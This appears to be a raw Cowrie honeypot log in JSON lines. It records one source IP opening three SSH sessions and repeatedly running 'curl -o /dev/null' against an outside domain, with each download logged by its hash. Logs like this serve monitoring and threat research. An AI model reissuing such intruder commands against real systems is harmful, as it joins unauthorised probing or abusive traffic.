{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:48.120853Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.122181Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:48.126705Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.127341Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.154028Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:48.155200Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.155806Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.161720Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:48.163351Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.164041Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.169407Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:48.170682Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.171292Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.174351Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:48.200356Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.201029Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:48.203993Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.204746Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.231477Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:48.236312Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.237128Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.242565Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.249350Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.259897Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.262673Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:48.266551Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.267186Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:48.272885Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.273579Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.280769Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:48.297147Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.297810Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.300788Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.302741Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.305188Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.307160Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:48.308379Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.308934Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:48.310977Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.312049Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.338278Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.340213Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:48.341629Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.342248Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:48.345215Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.345838Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:48.348261Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.348709Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.395027Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:48.395981Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.396406Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:48.398331Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.399056Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:48.400183Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.400943Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.403585Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.407431Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.434995Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.439059Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:48.440035Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.440567Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:48.442514Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.442977Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:48.445466Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.445846Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.455572Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.478336Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:48.479372Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.479853Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:48.482375Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.483124Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:48.484552Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.485283Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.491330Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.517636Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.519514Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:48.521895Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.522756Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:48.525974Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.527013Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:48.528490Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.528985Z","src_ip":"212.227.125.160","session":"9f264c568782"}
